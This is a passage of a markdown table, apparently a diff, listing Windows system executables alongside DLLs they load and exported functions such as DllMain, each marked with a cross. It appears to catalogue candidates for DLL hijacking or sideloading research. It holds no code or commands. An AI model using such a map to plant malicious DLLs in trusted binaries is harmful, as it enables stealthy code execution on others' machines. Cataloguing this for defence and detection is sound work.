dsclient.dll | DllMain | +| ❌ | dstokenclean.exe | dsclient.dll | DSRemoveExpiredTokens | +| ❌ | dwm.exe | CoreMessaging.dll | DllMain | +| ❌ | dwm.exe | d2d1.dll | DllMain | +| ❌ | dwm.exe | d3d11.dll | DllMain | +| ❌ | dwm.exe | D3DCOMPILER\_47.dll | DllMain | +| ❌ | dwm.exe | dwmcore.dll | DllMain | +| ❌ | dwm.exe | dxgi.dll | DllMain | +| ❌ | dwm.exe | dxgi.dll | DXGIDeclareAdapterRemovalSupport | +| ❌ | dwwin.exe | wer.dll | DllMain | +| ❌ | dxgiadaptercache.exe | d3d11.dll | DllMain | +| ❌ | dxgiadaptercache.exe | d3d12.dll | DllMain | +| ❌ | dxgiadaptercache.exe | dxgi.dll | DllMain | +| ❌ | dxpserver.exe | dwmapi.dll | DllMain | +| ❌ | dxpserver.exe | msi.dll | DllMain | +| ❌ | dxpserver.exe | PROPSYS.dll | DllMain | +| ❌ | dxpserver.exe | XmlLite.dll | DllMain | +| ❌ | easeofaccessdialog.exe | OLEACC.dll | DllMain | +| ❌ | edpcleanup.exe | DMCmnUtils.dll | DllMain | +| ❌ | edpcleanup.exe | DNSAPI.dll | DllMain | +| ❌ | edpcleanup.exe | FirewallAPI.dll | DllMain | +| ❌ | edpcleanup.exe | fwbase.dll | DllMain | +| ❌ | edpcleanup.exe | fwbase.dll | FwCriticalSectionCreate | +| ❌ | edpcleanup.exe | fwbase.dll | FwCriticalSectionDestroy | +| ❌ | edpcleanup.exe | netutils.dll | DllMain | +| ❌ | edpcleanup.exe | policymanager.dll | DllMain | +| ❌ | edpcleanup.exe | SspiCli.dll | DllMain | +| ❌ | edpcleanup.exe | wkscli.dll | DllMain | +| ❌ | eduprintprov.exe | deviceassociation.dll | DllMain | +| ❌ | eduprintprov.exe | policymanager.dll | DllMain | +| ❌ | eduprintprov.exe | policymanager.dll | PolicyManager\_GetPolicy | +| ❌ | eduprintprov.exe | SspiCli.dll | DllMain | +| ❌ | eduprintprov.exe | SspiCli.dll | GetUserNameExW | +| ❌ | efsui.exe | credui.dll | DllMain | +| ❌ | efsui.exe | CRYPTBASE.DLL | DllMain | +| ❌ | efsui.exe | CRYPTUI.dll | DllMain | +| ❌ | efsui.exe | DSROLE.dll | DllMain | +| ❌ | efsui.exe | EFSADU.dll | DllMain | +| ❌ | efsui.exe | EFSUTIL.dll | DllMain | +| ❌ | efsui.exe | FeClient.dll | DllMain | +| ❌ | efsui.exe | logoncli.dll | DllMain | +| ❌ | efsui.exe | netutils.dll | DllMain | +| ❌ | efsui.exe | USERENV.dll | DllMain | +| ❌ | efsui.exe | VAULTCLI.dll | DllMain | +| ❌ | ehstorauthn.exe | UxTheme.dll | DllMain | +| ❌ | esentutl.exe | ESENT.dll | DllMain | +| ❌ | eventcreate.exe | netutils.dll | DllMain | +| ❌ | eventcreate.exe | srvcli.dll | DllMain | +| ❌ | eventcreate.exe | SspiCli.dll | DllMain | +| ❌ | expand.exe | Cabinet.dll | DllMain | +| ❌ | extrac32.exe | Cabinet.dll | DllMain | +| ❌ | fhmanagew.exe | fhsvcctl.dll | DllMain | +| ❌ | filehistory.exe | CRYPTBASE.dll | DllMain | +| ❌ | filehistory.exe | CRYPTBASE.dll | SystemFunction036 | +| ❌ | filehistory.exe | UxTheme.dll | DllMain | +| ❌ | filehistory.exe | UxTheme.dll | EnableThemeDialogTexture | +| ❌ | filehistory.exe | UxTheme.dll | OpenThemeData | +| ❌ | fixmapi.exe | mapistub.dll | DllMain | +| ❌ | fixmapi.exe | mapistub.dll | FixMAPI | +| ❌ | fltmc.exe | FLTLIB.DLL | DllMain | +| ❌ | fltmc.exe | FLTLIB.DLL | FilterFindFirst | +| ❌ | fltmc.exe | FLTLIB.DLL | FilterFindNext | +| ❌ | fondue.exe | msi.dll | DllMain | +| ❌ | fondue.exe | osbaseln.dll | DllMain | +| ❌ | fondue.exe | PROPSYS.dll | DllMain | +| ❌ | fsiso.exe | iumbase.DLL | DllMain | +| ❌ | fsquirt.exe | DEVOBJ.dll | DevObjCreateDeviceInfoList | +| ❌ | fsquirt.exe | DEVOBJ.dll | DevObjDestroyDeviceInfoList | +| ❌ | fsquirt.exe | DEVOBJ.dll | DevObjGetClassDevs | +| ❌ | fsquirt.exe | DEVOBJ.dll | DllMain | +| ❌ | fsquirt.exe | dwmapi.dll | DllMain | +| ❌ | fsquirt.exe | dwmapi.dll | DwmExtendFrameIntoClientArea | +| ❌ | fsquirt.exe | OLEACC.dll | DllMain | +| ❌ | fsquirt.exe | OLEACC.dll | GetRoleTextW | +| ❌ | ftp.exe | SspiCli.dll | DllMain | +| ❌ | fvenotify.exe | FVEAPI.dll | DllMain | +| ❌ | fvenotify.exe | FVEAPI.dll | FveFindFirstVolume | +| ❌ | fvenotify.exe | FVEAPI.dll | FveFindNextVolume | +| ❌ | fvenotify.exe | FVEAPI.dll | FveGetStatus | +| ❌ | fvenotify.exe | FVEAPI.dll | FveGetVolumeNameW | +| ❌ | fvenotify.exe | FVEAPI.dll | FveIsVolumeEncryptable | +| ❌ | fvenotify.exe | FVEAPI.dll | FveOpenVolumeByHandle | +| ❌ | fvenotify.exe | FVEAPI.dll | FveOpenVolumeW | +| ❌ | fveprompt.exe | FVEAPI.dll | DllMain | +| ❌ | fxscover.exe | IPHLPAPI.DLL | DllMain | +| ❌ | fxscover.exe | IPHLPAPI.DLL | GetAdaptersAddresses | +| ❌ | fxssvc.exe | credui.dll | DllMain | +| ❌ | fxssvc.exe | FXSTIFF.dll | DllMain | +| ❌ | fxssvc.exe | IPHLPAPI.DLL | DllMain | +| ❌ | fxssvc.exe | PROPSYS.dll | DllMain | +| ❌ | fxssvc.exe | TAPI32.dll | DllMain | +| ❌ | gamepanel.exe | d2d1.dll | DllMain | +| ❌ | gamepanel.exe | d3d11.dll | DllMain | +| ❌ | gamepanel.exe | dcomp.dll | DllMain | +| ❌ | gamepanel.exe | dwmapi.dll | DllMain | +| ❌ | gamepanel.exe | dwmapi.dll | DwmSetWindowAttribute | +| ❌ | gamepanel.exe | DWrite.dll | DllMain | +| ❌ | gamepanel.exe | DWrite.dll | DWriteCreateFactory | +| ❌ | gamepanel.exe | dxgi.dll | CreateDXGIFactory2 | +| ❌ | gamepanel.exe | dxgi.dll | DllMain | +| ❌ | gamepanel.exe | msdrm.dll | DllMain | +| ❌ | gamepanel.exe | UIAutomationCore.DLL | DllMain | +| ❌ | gamepanel.exe | UxTheme.dll | DllMain | +| ❌ | gamepanel.exe | UxTheme.dll | EnableThemeDialogTexture | +| ❌ | gamepanel.exe | UxTheme.dll | OpenThemeData | +| ❌ | genvalobj.exe | bcd.dll | DllMain | +| ❌ | getmac.exe | netutils.dll | DllMain | +| ❌ | getmac.exe | srvcli.dll | DllMain | +| ❌ | getmac.exe | SspiCli.dll | DllMain | +| ❌ | getmac.exe | wkscli.dll | DllMain | +| ❌ | gpresult.exe | logoncli.dll | DllMain | +| ❌ | gpresult.exe | netutils.dll | DllMain | +| ❌ | gpresult.exe | NTDSAPI.dll | DllMain | +| ❌ | gpresult.exe | Secur32.dll | DllMain | +| ❌ | gpresult.exe | srvcli.dll | DllMain | +| ❌ | gpresult.exe | SspiCli.dll | DllMain | +| ❌ | gpupdate.exe | USERENV.dll | DllMain | +| ❌ | gpupdate.exe | wevtapi.dll | DllMain | +| ❌ | hvax64.exe | KDSTUB.dll | DllMain | +| ❌ | hvix64.exe | KDSTUB.dll | DllMain | +| ❌ | hvsievaluator.exe | DismApi.DLL | DllMain | +| ❌ | hvsievaluator.exe | DMCmnUtils.dll | DllMain | +| ❌ | hvsievaluator.exe | iri.dll | DllMain | +| ❌ | hvsievaluator.exe | omadmapi.dll | DllMain | +| ❌ | hvsievaluator.exe | policymanager.dll | DllMain | +| ❌ | hvsievaluator.exe | policymanager.dll | PolicyManager\_GetPolicyInt | +| ❌ | ie4uinit.exe | CRYPTBASE.DLL | DllMain | +| ❌ | ie4uinit.exe | IEADVPACK.dll | DllMain | +| ❌ | ie4uinit.exe | iedkcs32.dll | DllMain | +| ❌ | ie4uinit.exe | MLANG.dll | DllMain | +| ❌ | ie4uinit.exe | netutils.dll | DllMain | +| ❌ | ie4uinit.exe | WININET.dll | DllMain | +| ❌ | ie4uinit.exe | wkscli.dll | DllMain | +| ❌ | ieunatt.exe | dbgcore.DLL | DllMain | +| ❌ | klist.exe | secur32.dll | DllMain | +| ❌ | ksetup.exe | logoncli.dll | DllMain | +| ❌ | ksetup.exe | netutils.dll | DllMain | +| ❌ | ksetup.exe | srvcli.dll | DllMain | +| ❌ | ksetup.exe | SspiCli.dll | DllMain | +| ❌ | label.exe | DEVOBJ.dll | DllMain | +| ❌ | licensingdiag.exe | Cabinet.dll | DllMain | +| ❌ | licensingdiag.exe | Cabinet.dll | FCICreate | +| ❌ | licensingdiag.exe | CLIPC.dll | ClipGatherDiagnostics | +| ❌ | licensingdiag.exe | CLIPC.dll | ClipGenerateDeviceLicenseRequest | +| ❌ | licensingdiag.exe | CLIPC.dll | ClipGetLicenseAndPolicyForPfn | +| ❌ | licensingdiag.exe | CLIPC.dll | ClipOpen | +| ❌ | licensingdiag.exe | CLIPC.dll | DllMain | +| ❌ | lockscreencontentserver.exe | dwmapi.dll | DllMain | +| ❌ | lpksetup.exe | CRYPTBASE.dll | DllMain | +| ❌ | lpksetup.exe | CRYPTBASE.dll | SystemFunction036 | +| ❌ | lpksetup.exe | dpx.dll | DllMain | +| ❌ | lpremove.exe | AppXAllUserStore.dll | DllMain | +| ❌ | lpremove.exe | AppXAllUserStore.dll | IsNonInboxAllUserPackage | +| ❌ | lpremove.exe | AppXDeploymentClient.dll | DllMain | +| ❌ | lpremove.exe | Bcp47Langs.dll | Bcp47GetMuiForm | +| ❌ | lpremove.exe | Bcp47Langs.dll | DllMain | +| ❌ | lpremove.exe | Bcp47Langs.dll | GetUserLanguagesForUser | +| ❌ | lpremove.exe | DNSAPI.dll | DllMain | +| ❌ | lpremove.exe | FirewallAPI.dll | DllMain | +| ❌ | lpremove.exe | fwbase.dll | DllMain | +| ❌ | lpremove.exe | fwbase.dll | FwCriticalSectionCreate | +| ❌ | lpremove.exe | fwbase.dll | FwCriticalSectionDestroy | +| ❌ | lpremove.exe | StateRepository.Core.dll | DllMain | +| ❌ | magnify.exe | d3d9.dll | DllMain | +| ❌ | magnify.exe | MAGNIFICATION.dll | DllMain | +| ❌ | magnify.exe | MAGNIFICATION.dll | MagInitialize | +| ❌ | magnify.exe | MAGNIFICATION.dll | MagSetFullscreenTransform | +| ❌ | magnify.exe | MAGNIFICATION.dll | MagSetFullscreenUseBitmapSmoothing | +| ❌ | magnify.exe | MAGNIFICATION.dll | MagSetInputTransform | +| ❌ | magnify.exe | MAGNIFICATION.dll | MagShowSystemCursor | +| ❌ | magnify.exe | MAGNIFICATION.dll | MagUninitialize | +| ❌ | magnify.exe | OLEACC.dll | DllMain | +| ❌ | magnify.exe | UIAutomationCore.DLL | DllMain | +| ❌ | magnify.exe | WTSAPI32.dll | DllMain | +| ❌ | makecab.exe | Cabinet.dll | DllMain | +| ❌ | mcbuilder.exe | bcp47mrm.dll | DllMain | +| ❌ | mcbuilder.exe | bcp47mrm.dll | IsWellFormedTag | +| ❌ | mcbuilder.exe | mrmcoreR.dll | DllMain | +| ❌ | mcbuilder.exe | mrmcoreR.dll | MergeSystemPriFiles | +| ❌ | mdeserver.exe | d3d11.dll | DllMain | +| ❌ | mdeserver.exe | dxgi.dll | DllMain | +| ❌ | mdeserver.exe | MFPlat.DLL | DllMain | +| ❌ | mdeserver.exe | MFPlat.DLL | MFStartup | +| ❌ | mdeserver.exe | RTWorkQ.DLL | DllMain | +| ❌ | mdeserver.exe | RTWorkQ.DLL | RtwqRegisterPlatformEvents | +| ❌ | mdeserver.exe | RTWorkQ.DLL | RtwqStartup | +| ❌ | mdeserver.exe | SspiCli.dll | DllMain | +| ❌ | mdeserver.exe | winmde.dll | DllMain | +| ❌ | mdmappinstaller.exe | DEVOBJ.dll | DllMain | +| ❌ | mdmappinstaller.exe | DMCmnUtils.dll | DllMain | +| ❌ | mdmappinstaller.exe | dmEnrollEngine.DLL | DllMain | +| ❌ | mdmappinstaller.exe | iri.dll | DllMain | +| ❌ | mdmappinstaller.exe | msi.dll | DllMain | +| ❌ | mdmappinstaller.exe | omadmapi.dll | DllMain | +| ❌ | mdmappinstaller.exe | USERENV.dll | DllMain | +| ❌ | mdmappinstaller.exe | WTSAPI32.dll | DllMain | +| ❌ | mdmdiagnosticstool.exe | DEVOBJ.dll | DllMain | +| ❌ | mdmdiagnosticstool.exe | DMCmnUtils.dll | DllMain | +| ❌ | mdmdiagnosticstool.exe | dmEnrollEngine.DLL | DllMain | +| ❌ | mdmdiagnosticstool.exe | dmiso8601utils.dll | DllMain | +| ❌ | mdmdiagnosticstool.exe | DynamoAPI.dll | DllMain | +| ❌ | mdmdiagnosticstool.exe | iri.dll | DllMain | +| ❌ | mdmdiagnosticstool.exe | MdmDiagnostics.dll | DllMain | +| ❌ | mdmdiagnosticstool.exe | omadmapi.dll | DllMain | +| ❌ | mdmdiagnosticstool.exe | policymanager.dll | DllMain | +| ❌ | mdmdiagnosticstool.exe | tbs.dll | DllMain | +| ❌ | mdmdiagnosticstool.exe | USERENV.dll | DllMain | +| ❌ | mdmdiagnosticstool.exe | WINHTTP.dll | DllMain | +| ❌ | mdmdiagnosticstool.exe | WININET.dll | DllMain | +| ❌ | mdmdiagnosticstool.exe | XmlLite.dll | DllMain | +| ❌ | mfpmp.exe | CRYPTBASE.DLL | DllMain | +| ❌ | mfpmp.exe | ksuser.dll | DllMain | +| ❌ | mfpmp.exe | MFCORE.dll | DllMain | +| ❌ | mfpmp.exe | MFPlat.DLL | DllMain | +| ❌ | mfpmp.exe | MFPlat.DLL | MFGetCallStackTracingWeakReference | +| ❌ | mfpmp.exe | MFPlat.DLL | MFShutdown | +| ❌ | mfpmp.exe | RTWorkQ.DLL | DllMain | +| ❌ | mfpmp.exe | RTWorkQ.DLL | RtwqRegisterPlatformEvents | +| ❌ | mfpmp.exe | RTWorkQ.DLL | RtwqShutdown | +| ❌ | microsoft.uev.cscunpintool.exe | CSCAPI.dll | DllMain | +| ❌ | microsoft.uev.cscunpintool.exe | CSCAPI.dll | OfflineFilesQueryStatus | +| ❌ | microsoftedgebchost.exe | iertutil.dll | DllMain | +| ❌ | microsoftedgebchost.exe | USERENV.dll | DllMain | +| ❌ | microsoftedgecp.exe | iertutil.dll | DllMain | +| ❌ | microsoftedgecp.exe | USERENV.dll | DllMain | +| ❌ | microsoftedgedevtools.exe | iertutil.dll | DllMain | +| ❌ | microsoftedgesh.exe | USERENV.dll | DllMain | +| ❌ | microsoftedgesh.exe | USERENV.dll | GetAppContainerRegistryLocation | +| ❌ | mobsync.exe | edputil.dll | DllMain | +| ❌ | mobsync.exe | edputil.dll | EdpGetIsManaged | +| ❌ | mobsync.exe | PROPSYS.dll | DllMain | +| ❌ | mobsync.exe | PROPSYS.dll | PSGetNameFromPropertyKey | +| ❌ | mobsync.exe | PROPSYS.dll | PSStringFromPropertyKey | +| ❌ | mobsync.exe | PROPSYS.dll | VariantToString | +| ❌ | mousocoreworker.exe | winsqlite3.dll | DllMain | +| ❌ | msdt.exe | ATL.DLL | DllMain | +| ❌ | msdt.exe | Cabinet.dll | DllMain | +| ❌ | msdt.exe | SSPICLI.DLL | DllMain | +| ❌ | msdt.exe | SSPICLI.DLL | GetUserNameExW | +| ❌ | msdt.exe | UxTheme.dll | DllMain | +| ❌ | msdt.exe | wer.dll | DllMain | +| ❌ | msdt.exe | WINHTTP.dll | DllMain | +| ❌ | msdtc.exe | CLUSAPI.dll | DllMain | +| ❌ | msdtc.exe | DNSAPI.dll | DllMain | +| ❌ | msdtc.exe | ktmw32.dll | DllMain | +| ❌ | msdtc.exe | MSDTCTM.dll | DllMain | +| ❌ | msdtc.exe | MSDTCTM.dll | DtcMainExt | +| ❌ | msdtc.exe | MTXCLU.DLL | DllMain | +| ❌ | msdtc.exe | RESUTILS.dll | DllMain | +| ❌ | msdtc.exe | XOLEHLP.dll | DllMain | +| ❌ | msg.exe | WINSTA.dll | DllMain | +| ❌ | mshta.exe | CRYPTBASE.DLL | DllMain | +| ❌ | mshta.exe | netutils.dll | DllMain | +| ❌ | mshta.exe | srpapi.dll | DllMain | +| ❌ | mshta.exe | srpapi.dll | SrpGetEnterpriseIds | +| ❌ | mshta.exe | SspiCli.dll | DllMain | +| ❌ | mshta.exe | SspiCli.dll | GetUserNameExW | +| ❌ | mshta.exe | WINHTTP.dll | DllMain | +| ❌ | mshta.exe | wkscli.dll | DllMain | +| ❌ | mshta.exe | WLDP.DLL | DllMain | +| ❌ | mshta.exe | WLDP.DLL | WldpGetLockdownPolicy | +| ❌ | msiexec.exe | msi.dll | DllMain | +| ❌ | msiexec.exe | msi.dll | MsiLoadStringW | +| ❌ | msiexec.exe | msi.dll | MsiMessageBoxExW | +| ❌ | msinfo32.exe | ATL.DLL | DllMain | +| ❌ | msinfo32.exe | SLC.dll | DllMain | +| ❌ | msinfo32.exe | sppc.dll | DllMain | +| ❌ | mspaint.exe | MSFTEDIT.DLL | DllMain | +| ❌ | mspaint.exe | PROPSYS.dll | DllMain | +| ❌ | msra.exe | IPHLPAPI.DLL | DllMain | +| ❌ | msra.exe | IPHLPAPI.DLL | GetAdaptersAddresses | +| ❌ | msra.exe | IPHLPAPI.DLL | NotifyUnicastIpAddressChange | +| ❌ | msra.exe | NDFAPI.DLL | DllMain | +| ❌ | msra.exe | SspiCli.dll | DllMain | +| ❌ | msra.exe | SspiCli.dll | GetUserNameExA | +| ❌ | msra.exe | SspiCli.dll | GetUserNameExW | +| ❌ | msra.exe | USERENV.dll | DllMain | +| ❌ | msra.exe | USERENV.dll | GetProfileType | +| ❌ | msra.exe | UxTheme.dll | DllMain | +| ❌ | msra.exe | UxTheme.dll | IsAppThemed | +| ❌ | msra.exe | UxTheme.dll | IsThemeActive | +| ❌ | msra.exe | UxTheme.dll | OpenThemeData | +| ❌ | msra.exe | wdi.dll | DllMain | +| ❌ | mstsc.exe | credui.dll | DllMain | +| ❌ | mstsc.exe | CRYPTBASE.DLL | DllMain | +| ❌ | mstsc.exe | CRYPTUI.dll | DllMain | +| ❌ | mstsc.exe | IPHLPAPI.DLL | DllMain | +| ❌ | mstsc.exe | ktmw32.dll | DllMain | +| ❌ | mstsc.exe | NETUTILS.DLL | DllMain | +| ❌ | mstsc.exe | SSPICLI.DLL | DllMain | +| ❌ | mstsc.exe | WINHTTP.dll | DllMain | +| ❌ | mstsc.exe | WININET.dll | DllMain | +| ❌ | mstsc.exe | WKSCLI.DLL | DllMain | +| ❌ | mtstocom.exe | SspiCli.dll | DllMain | +| ❌ | muiunattend.exe | dbgcore.DLL | DllMain | +| ❌ | muiunattend.exe | SspiCli.dll | DllMain | +| ❌ | muiunattend.exe | wdscore.dll | ConstructPartialMsgVW | +| ❌ | muiunattend.exe | wdscore.dll | CurrentIP | +| ❌ | muiunattend.exe | wdscore.dll | DllMain | +| ❌ | muiunattend.exe | wdscore.dll | WdsSetupLogInit | +| ❌ | muiunattend.exe | wdscore.dll | WdsSetupLogMessageW | +| ❌ | musnotification.exe | Cabinet.dll | DllMain | +| ❌ | musnotification.exe | UpdatePolicy.dll | DllMain | +| ❌ | musnotification.exe | UPShared.dll | DllMain | +| ❌ | musnotification.exe | USERENV.dll | DllMain | +| ❌ | musnotification.exe | WINHTTP.dll | DllMain | +| ❌ | musnotification.exe | WINSTA.dll | DllMain | +| ❌ | musnotification.exe | WINSTA.dll | WinStationEnumerateW | +| ❌ | musnotificationux.exe | Cabinet.dll | DllMain | +| ❌ | musnotificationux.exe | DMCmnUtils.dll | DllMain | +| ❌ | musnotificationux.exe | UpdatePolicy.dll | DllMain | +| ❌ | musnotificationux.exe | UPShared.dll | DllMain | +| ❌ | musnotificationux.exe | WINHTTP.dll | DllMain | +| ❌ | musnotificationux.exe | XmlLite.dll | DllMain | +| ❌ | musnotifyicon.exe | DMCmnUtils.dll | DllMain | +| ❌ | musnotifyicon.exe | UPShared.dll | DllMain | +| ❌ | musnotifyicon.exe | WINHTTP.dll | DllMain | +| ❌ | musnotifyicon.exe | XmlLite.dll | DllMain | +| ❌ | nbtstat.exe | IPHLPAPI.DLL | DllMain | +| ❌ | net.exe | IPHLPAPI.DLL | DllMain | +| ❌ | net.exe | netutils.dll | DllMain | +| ❌ | net.exe | netutils.dll | NetApiBufferAllocate | +| ❌ | net.exe | samcli.dll | DllMain | +| ❌ | net.exe | srvcli.dll | DllMain | +| ❌ | net.exe | wkscli.dll | DllMain | +| ❌ | net1.exe | CRYPTBASE.dll | DllMain | +| ❌ | net1.exe | DSROLE.dll | DllMain | +| ❌ | net1.exe | logoncli.dll | DllMain | +| ❌ | net1.exe | netutils.dll | DllMain | +| ❌ | net1.exe | netutils.dll | NetApiBufferAllocate | +| ❌ | net1.exe | samcli.dll | DllMain | +| ❌ | net1.exe | srvcli.dll | DllMain | +| ❌ | net1.exe | wkscli.dll | DllMain | +| ❌ | netbtugc.exe | dbgcore.DLL | DllMain | +| ❌ | netbtugc.exe | IPHLPAPI.DLL | DllMain | +| ❌ | netbtugc.exe | wdscore.dll | ConstructPartialMsgVA | +| ❌ | netbtugc.exe | wdscore.dll | CurrentIP | +| ❌ | netbtugc.exe | wdscore.dll | DllMain | +| ❌ | netbtugc.exe | wdscore.dll | WdsSetupLogDestroy | +| ❌ | netbtugc.exe | wdscore.dll | WdsSetupLogInit | +| ❌ | netbtugc.exe | wdscore.dll | WdsSetupLogMessageA | +| ❌ | nethost.exe | RASAPI32.dll | DllMain | +| ❌ | nethost.exe | RASAPI32.dll | RasConfigUserProxySettingsW | +| ❌ | nethost.exe | rasman.dll | DllMain | +| ❌ | nethost.exe | rtutils.dll | DllMain | +| ❌ | nethost.exe | rtutils.dll | TraceRegisterExA | +| ❌ | netiougc.exe | dbgcore.DLL | DllMain | +| ❌ | netiougc.exe | dhcpcsvc.DLL | DllMain | +| ❌ | netiougc.exe | IPHLPAPI.DLL | DllMain | +| ❌ | netiougc.exe | wdscore.dll | ConstructPartialMsgVA | +| ❌ | netiougc.exe | wdscore.dll | CurrentIP | +| ❌ | netiougc.exe | wdscore.dll | DllMain | +| ❌ | netiougc.exe | wdscore.dll | WdsSetupLogDestroy | +| ❌ | netiougc.exe | wdscore.dll | WdsSetupLogInit | +| ❌ | netiougc.exe | wdscore.dll | WdsSetupLogMessageA | +| ❌ | netsh.exe | adsldpc.dll | DllMain | +| ❌ | netsh.exe | AUTHFWCFG.DLL | DllMain | +| ❌ | netsh.exe | AUTHFWCFG.DLL | InitHelperDll | +| ❌ | netsh.exe | Cabinet.dll | DllMain | +| ❌ | netsh.exe | CRYPTBASE.DLL | DllMain | +| ❌ | netsh.exe | DHCPCMONITOR.DLL | DllMain | +| ❌ | netsh.exe | DHCPCMONITOR.DLL | InitHelperDll | +| ❌ | netsh.exe | dhcpcsvc.DLL | DllMain | +| ❌ | netsh.exe | dhcpcsvc6.DLL | DllMain | +| ❌ | netsh.exe | DNSAPI.dll | DllMain | +| ❌ | netsh.exe | dot3api.dll | DllMain | +| ❌ | netsh.exe | DOT3CFG.DLL | DllMain | +| ❌ | netsh.exe | DOT3CFG.DLL | InitHelperDll | +| ❌ | netsh.exe | eappcfg.dll | DllMain | +| ❌ | netsh.exe | eappprxy.dll | DllMain | +| ❌ | netsh.exe | FirewallAPI.dll | DllMain | +| ❌ | netsh.exe | FirewallAPI.dll | FwAlloc | +| ❌ | netsh.exe | FirewallAPI.dll | FwFree | +| ❌ | netsh.exe | fwbase.dll | DllMain | +| ❌ | netsh.exe | fwbase.dll | FwAlloc | +| ❌ | netsh.exe | fwbase.dll | FwBaseAlloc | +| ❌ | netsh.exe | fwbase.dll | FwBaseFree | +| ❌ | netsh.exe | fwbase.dll | FwCriticalSectionCreate | +| ❌ | netsh.exe | fwbase.dll | FwReportErrorAsWinError | +| ❌ | netsh.exe | FWCFG.DLL | DllMain | +| ❌ | netsh.exe | FWCFG.DLL | InitHelperDll | +| ❌ | netsh.exe | FWPolicyIOMgr.dll | DllMain | +| ❌ | netsh.exe | fwpuclnt.dll | DllMain | +| ❌ | netsh.exe | HNETMON.DLL | DllMain | +| ❌ | netsh.exe | HNETMON.DLL | InitHelperDll | +| ❌ | netsh.exe | HTTPAPI.dll | DllMain | +| ❌ | netsh.exe | HTTPAPI.dll | HttpInitialize | +| ❌ | netsh.exe | IFMON.DLL | DllMain | +| ❌ | netsh.exe | IFMON.DLL | InitHelperDll | +| ❌ | netsh.exe | IPHLPAPI.DLL | DllMain | +| ❌ | netsh.exe | IPHLPAPI.DLL | GetDefaultCompartmentId | +| ❌ | netsh.exe | ktmw32.dll | CreateTransaction | +| ❌ | netsh.exe | ktmw32.dll | DllMain | +| ❌ | netsh.exe | mintdh.dll | DllMain | +| ❌ | netsh.exe | mintdh.dll | TdhpSetWbemExtensionBlock | +| ❌ | netsh.exe | MobileNetworking.dll | DllMain | +| ❌ | netsh.exe | NDFAPI.DLL | DllMain | +| ❌ | netsh.exe | NETIOHLP.DLL | DllMain | +| ❌ | netsh.exe | NETIOHLP.DLL | InitHelperDll | +| ❌ | netsh.exe | netshell.dll | DllMain | +| ❌ | netsh.exe | NETTRACE.DLL | DllMain | +| ❌ | netsh.exe | NETTRACE.DLL | InitHelperDll | +| ❌ | netsh.exe | nlaapi.dll | DllMain | +| ❌ | netsh.exe | NSHHTTP.DLL | DllMain | +| ❌ | netsh.exe | NSHHTTP.DLL | InitHelperDll | +| ❌ | netsh.exe | NSHIPSEC.DLL | DllMain | +| ❌ | netsh.exe | NSHIPSEC.DLL | InitHelperDll | +| ❌ | netsh.exe | NSHWFP.DLL | DllMain | +| ❌ | netsh.exe | NSHWFP.DLL | InitHelperDll | +| ❌ | netsh.exe | OneX.DLL | DllMain | +| ❌ | netsh.exe | P2P.dll | DllMain | +| ❌ | netsh.exe | P2PNETSH.DLL | DllMain | +| ❌ | netsh.exe | P2PNETSH.DLL | InitHelperDll | +| ❌ | netsh.exe | PEERDISTSH.DLL | DllMain | +| ❌ | netsh.exe | PEERDISTSH.DLL | InitHelperDll | +| ❌ | netsh.exe | POLSTORE.DLL | DllMain | +| ❌ | netsh.exe | POLSTORE.DLL | IPSecOpenPolicyStore | +| ❌ | netsh.exe | RASAPI32.dll | DllMain | +| ❌ | netsh.exe | rasman.dll | DllMain | +| ❌ | netsh.exe | RASMONTR.DLL | DllMain | +| ❌ | netsh.exe | RASMONTR.DLL | InitHelperDll | +| ❌ | netsh.exe | RMCLIENT.dll | DllMain | +| ❌ | netsh.exe | RPCNSH.DLL | DllMain | +| ❌ | netsh.exe | RPCNSH.DLL | InitHelperDll | +| ❌ | netsh.exe | SLC.dll | DllMain | +| ❌ | netsh.exe | SLC.dll | SLRegisterWindowsEvent | +| ❌ | netsh.exe | sppc.dll | DllMain | +| ❌ | netsh.exe | sppc.dll | SLRegisterEvent | +| ❌ | netsh.exe | SspiCli.dll | DllMain | +| ❌ | netsh.exe | USERENV.dll | DllMain | +| ❌ | netsh.exe | USERENV.dll | RegisterGPNotification | +| ❌ | netsh.exe | wcmapi.dll | DllMain | +| ❌ | netsh.exe | WCNNETSH.DLL | DllMain | +| ❌ | netsh.exe | WCNNETSH.DLL | InitHelperDll | +| ❌ | netsh.exe | wdi.dll | DllMain | +| ❌ | netsh.exe | wevtapi.dll | DllMain | +| ❌ | netsh.exe | WHHELPER.DLL | DllMain | +| ❌ | netsh.exe | WHHELPER.DLL | InitHelperDll | +| ❌ | netsh.exe | WINHTTP.dll | DllMain | +| ❌ | netsh.exe | WINIPSEC.DLL | DllMain | +| ❌ | netsh.exe | WINNSI.DLL | DllMain | +| ❌ | netsh.exe | wlanapi.dll | DllMain | +| ❌ | netsh.exe | WLANCFG.DLL | DllMain | +| ❌ | netsh.exe | WLANCFG.DLL | InitHelperDll | +| ❌ | netsh.exe | WSHELPER.DLL | DllMain | +| ❌ | netsh.exe | WSHELPER.DLL | InitHelperDll | +| ❌ | netsh.exe | WWANCFG.DLL | DllMain | +| ❌ | netsh.exe | WWANCFG.DLL | InitHelperDll | +| ❌ | netsh.exe | wwapi.dll | DllMain | +| ❌ | netstat.exe | IPHLPAPI.DLL | DllMain | +| ❌ | netstat.exe | IPHLPAPI.DLL | InternalGetIfTable | +| ❌ | netstat.exe | IPHLPAPI.DLL | InternalGetTcpTable2 | +| ❌ | netstat.exe | snmpapi.dll | DllMain | +| ❌ | netstat.exe | snmpapi.dll | SnmpTfxOpen | +| ❌ | ngciso.exe | iumbase.DLL | DllMain | +| ❌ | nltest.exe | logoncli.dll | DllMain | +| ❌ | nltest.exe | netutils.dll | DllMain | +| ❌ | nltest.exe | NTDSAPI.dll | DllMain | +| ❌ | nslookup.exe | DNSAPI.dll | DllMain | +| ❌ | nslookup.exe | DNSAPI.dll | DnsQueryConfigAllocEx | +| ❌ | omadmclient.exe | DEVOBJ.dll | DllMain | +| ❌ | omadmclient.exe | DMCfgUtils.dll | DllMain | +| ❌ | omadmclient.exe | DMCmnUtils.dll | DllMain | +| ❌ | omadmclient.exe | dmEnrollEngine.DLL | DllMain | +| ❌ | omadmclient.exe | dmenterprisediagnostics.dll | DllMain | +| ❌ | omadmclient.exe | dmiso8601utils.dll | DllMain | +| ❌ | omadmclient.exe | DMOleAutUtils.dll | DllMain | +| ❌ | omadmclient.exe | dmxmlhelputils.dll | DllMain | +| ❌ | omadmclient.exe | IPHLPAPI.DLL | DllMain | +| ❌ | omadmclient.exe | iri.dll | DllMain | +| ❌ | omadmclient.exe | omadmapi.dll | DllMain | +| ❌ | omadmclient.exe | 